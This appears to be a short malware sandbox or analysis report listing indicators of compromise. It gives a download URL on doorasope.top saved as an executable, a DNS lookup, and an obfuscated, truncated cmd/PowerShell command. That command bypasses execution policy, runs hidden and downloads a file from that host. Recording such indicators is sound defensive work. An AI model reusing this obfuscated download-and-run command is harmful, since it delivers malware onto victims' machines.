Technical Information
- http://www.doorasope.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^werS^hE^lL.e^XE -^eXEcuTi^on^po^liCY^ ^BYpaSS -nOP^ro^FILE ^-^wi^Ndo^WsTylE hID^D^en (^ne^w^-^O^b^j^eCT^ sYs^t^EM^.Net^.^webClIent).do^wn^lOadfIL^E('http://www.doora...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^O^werS^hE^lL.e^XE -^eXEcuTi^on^po^liCY^ ^BYpaSS -nOP^ro^FILE ^-^wi^Ndo^WsTylE hID^D^en (^ne^w^-^O^b^j^eCT^ sYs^t^EM^.Net^.^webClIent).do^wn^lOadfIL^E('http://www.doora...' (with hidden window)